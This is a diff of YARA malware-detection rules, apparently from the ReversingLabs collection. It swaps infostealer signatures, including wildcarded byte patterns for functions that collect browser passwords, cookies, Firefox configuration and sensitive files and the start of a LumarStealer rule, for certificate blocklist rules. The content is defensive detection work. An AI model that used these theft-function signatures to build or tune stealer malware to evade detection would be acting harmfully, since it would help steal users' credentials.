-            8D 75 ?? 48 83 7D ?? ?? 4C 0F 47 75 ?? 49 BC ?? ?? ?? ?? ?? ?? ?? ?? 49 3B FC 0F 87
-            ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89
-            85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 48 83 FF ?? 77 ??
-            48 89 7C 24 ?? BA ?? ?? ?? ?? 48 89 54 24 ?? 41 0F 10 06 0F 11 44 24 ?? EB ?? 48 8B
-            DF 48 83 CB ?? 49 3B DC 76 ?? 49 8B DC EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8
-            48 8D 4B ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7C 24 ?? 48 89 5C 24 ?? 4C 8D 47 ??
-            49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11
-            85 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 FA ?? 48
-            0F 47 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48
-            85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B
-            4C 24 ?? 4C 89 6C 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8D 15 ?? ??
-            ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ??
-            ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05
-            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF
-            15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15
-        }
-		$parse_firefox_configuration_p3 = {
-            4C 8B 7D ?? 49 8B C4 49 2B C7 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ??
-            ?? 4C 0F 47 65 ?? 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4D ?? 4D
-            8D 77 ?? BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ??
-            E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24
-            ?? 4C 3B F3 76 ?? 49 8B DE 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ??
-            48 8B D8 EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8 48 8D 4B ?? E8 ?? ?? ?? ?? 48
-            8B F8 48 89 44 24 ?? 4C 89 75 ?? 48 89 5D ?? 4D 8B C7 49 8B D4 48 8B CF E8 ?? ?? ??
-            ?? 42 C7 04 3F ?? ?? ?? ?? 42 C6 04 37 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ??
-            ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? FF D0 4C 8B 75 ?? 48 8B 5D ?? 49
-            3B DE 0F 84 ?? ?? ?? ?? 48 83 C3 ?? 0F 1F 40 ?? 48 8D 43 ?? 48 8D 4D ?? 48 3B C8 74
-            ?? 48 8B D3 48 83 7B ?? ?? 76 ?? 48 8B 13 4C 8B 43 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48
-            8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ??
-            ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 40 ?? 49 FF C0 42 80 3C 00 ?? 75 ?? 48 8B D0 48 8D 4D
-            ?? E8 ?? ?? ?? ?? 48 8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ??
-            48 8B C8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 44 00 ?? 49 FF C0 42 80 3C 00 ??
-            75 ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7E ?? 48 3B 7E ?? 74 ?? 48
-            89 BD ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 55 ?? E8
-            ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 56 ?? 4C 8B
-            C2 48 8B CE E8 ?? ?? ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D7 48 8B CE E8 ??
-            ?? ?? ?? 48 83 C3 ?? 48 8D 43 ?? 49 3B C6 0F 85 ?? ?? ?? ?? 48 8D 4C 24
-        }
-		$collect_browser_passwords_p1 = {
-            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ??
-            48 63 DA 48 8B F9 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ??
-            45 33 ED 4C 89 29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C
-            89 68 ?? 48 89 07 48 89 38 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48
-            8D 0C 9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B
-            12 4D 8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0
-            48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45
-            ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ??
-            ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 8B CB E8 ??
-            ?? ?? ?? 4C 8B E0 4C 89 6D ?? 4C 89 6D ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D
-            ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 4C 89 6D ??
-            48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15
-            ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 89 6C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ??
-            ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ??
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 33 D2 48 8B
-            4D ?? FF 15 ?? ?? ?? ?? 4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B
-        }
-		$collect_browser_passwords_p2 = {
-            F0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 4C 8B F0 BA ?? ?? ?? ?? 48 8B 4D ??
-            FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ??
-            ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 C7 C0 ?? ?? ?? ??
-            48 FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? 41 0F 10 34 24 4C 89 6C 24
-            ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F
-            1F 44 00 ?? 49 FF C0 42 80 3C 03 ?? 75 ?? 48 8B D3 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F
-            29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 15 ??
-            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ?? ?? ?? 48 8B
-            C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
-            48 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F
-            47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ??
-            ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8
-            ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 06 ?? 75 ?? 49 8B D6 48 8D 4D ??
-            E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 48 89 5C 24 ?? 48 8D 55 ?? 48 8B
-        }
-		$collect_browser_passwords_p3 = {
-            CB E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 55 ?? E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 95
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 57 ?? 4C 8B C2 48 8B CF E8 ?? ?? ?? ?? 48 83 47
-            ?? ?? EB ?? 4C 8D 45 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ??
-            ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C
-            89 6D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ??
-            0F 84 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 49 8B CC E8 ?? ?? ??
-            ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45
-            ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B
-            45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05
-            ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B
-            55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ??
-            C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C7 48 8B 8D ?? ?? ??
-            ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4
-            ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
-        }
-		$collect_cookies_p1 = {
-            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ??
-            48 63 DA 4C 8B F1 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ??
-            33 FF 48 89 39 48 89 79 ?? 48 89 79 ?? 48 89 79 ?? 8D 4F ?? E8 ?? ?? ?? ?? 48 89 78
-            ?? 49 89 06 4C 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 0C
-            9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B 12 4D
-            8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B
-            55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45 ?? ??
-            48 8B 4D ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ??
-            84 C0 0F 84 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7D ?? 48 89 7D ??
-            0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 89 7D ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ??
-            48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ??
-            ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ??
-            48 89 7C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ??
-            ?? 0F 1F 80 ?? ?? ?? ?? 33 D2 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F0 BA ?? ?? ?? ??
-            48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15
-        }
-		$collect_cookies_p2 = {
-            4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B
-            4D ?? FF 15 ?? ?? ?? ?? 4C 8B E0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B
-            E8 48 85 F6 75 ?? 48 85 FF 75 ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48
-            FF C1 80 3C 0E ?? 75 ?? 48 85 C9 75 ?? 48 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
-            48 FF C0 80 3C 07 ?? 75 ?? 48 85 C0 75 ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ??
-            75 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 45 85 ED 0F 8E ?? ??
-            ?? ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ??
-            48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D6 E8 ?? ??
-            ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B C8 48 8B D7 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 0F 10 30
-            45 33 ED 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7
-            C0 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 49 FF C0 46 38 2C 03 75 ?? 48 8B D3 48 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 0F 29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ??
-            ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83
-            7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ??
-            48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ??
-            ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B C8 49 8B D4 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8
-        }
-		$collect_cookies_p3 = {
-            49 C7 C0 ?? ?? ?? ?? 90 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8 ?? ??
-            ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 42 80 3C 07 ?? 75 ?? 48 8B D7 48 8D 4D
-            ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 43 80 3C 07 ?? 75 ?? 49 8B
-            D7 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 04 ??
-            75 ?? 49 8B D4 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F
-            47 55 ?? 4C 8B 45 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8D 45 ?? 49 3B 56 ??
-            74 ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8B C2 49 8B CE E8 ?? ?? ?? ?? 49 81 46 ?? ?? ??
-            ?? ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83
-            F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 6D ?? 48 C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
-            8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33
-            FF 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48
-            8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ??
-            ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45
-            ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ??
-            ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 49 8B C6 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.eos.com" and pe.signatures [ i ] . serial == "06:2b:28:27:50:0c:5d:f3:5a:83:f6:61:b3:af:5d:d3" and 1651449600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "a3e6923a-f2c4-5d7c-aeab-bdb7fe03c597"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10936-L10952"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "94d8739761b6a8ee91550be47432b046609b076aab6e57996de123a0fcaba73e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $network_communication ) and ( all of ( $find_sensitive_files_p* ) ) and ( all of ( $parse_firefox_configuration_p* ) ) and ( all of ( $collect_browser_passwords_p* ) ) and ( all of ( $collect_cookies_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Game Warriors Limited" and pe.signatures [ i ] . serial == "7b:f2:76:95:fd:20:b5:88:f2:b2:f1:73:b6:ca:f2:ba" and 1662112800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Infostealer_Lumarstealer : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LumarStealer infostealer."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a1358846-7cc2-53ac-89a9-c6c99f492284"
-		date = "2023-12-07"
-		modified = "2023-12-07"
+		id = "4ad05207-10d1-53c5-8383-a3c71a447ed6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/infostealer/Win32.Infostealer.LumarStealer.yara#L1-L190"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0bc9e12396b1e85f69b965e9ea50960c59c50aba40317fb4de8f6abd092ec7d2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10954-L10970"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2c063d0878a8bf6cd637e1dac2cb9164beb52c951e01858a7c3c9c4c1a853f54"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "LumarStealer"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$collect_os_information_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 66
-            A3 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ??
-            66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
-            89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89
-            4D ?? BA ?? ?? ?? ?? 66 89 55 ?? C6 45 ?? ?? EB ?? 8A 45 ?? 04 ?? 88 45 ?? 0F B6 4D
-            ?? 83 F9 ?? 73 ?? 0F B6 55 ?? 0F B7 44 55 ?? 0F B7 0D ?? ?? ?? ?? 3B C1 75 ?? FF 25
-            ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 89 55 ?? 89 55 ?? C7 45 ?? ??
-            ?? ?? ?? 8D 75 ?? B8 ?? ?? ?? ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E ?? 89 56 ?? B8 ??
-            ?? ?? ?? 6B C8 ?? 8B 54 0D ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ??
-            89 45 ?? 8B 4D ?? 3B 4D ?? 77 ?? 8D 75 ?? 8B 45 ?? 33 C9 0F A2 89 06 89 5E ?? 89 4E
-            ?? 89 56 ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 55 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? EB ?? 81 7D ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 4D ?? 51 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 80 ?? ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74
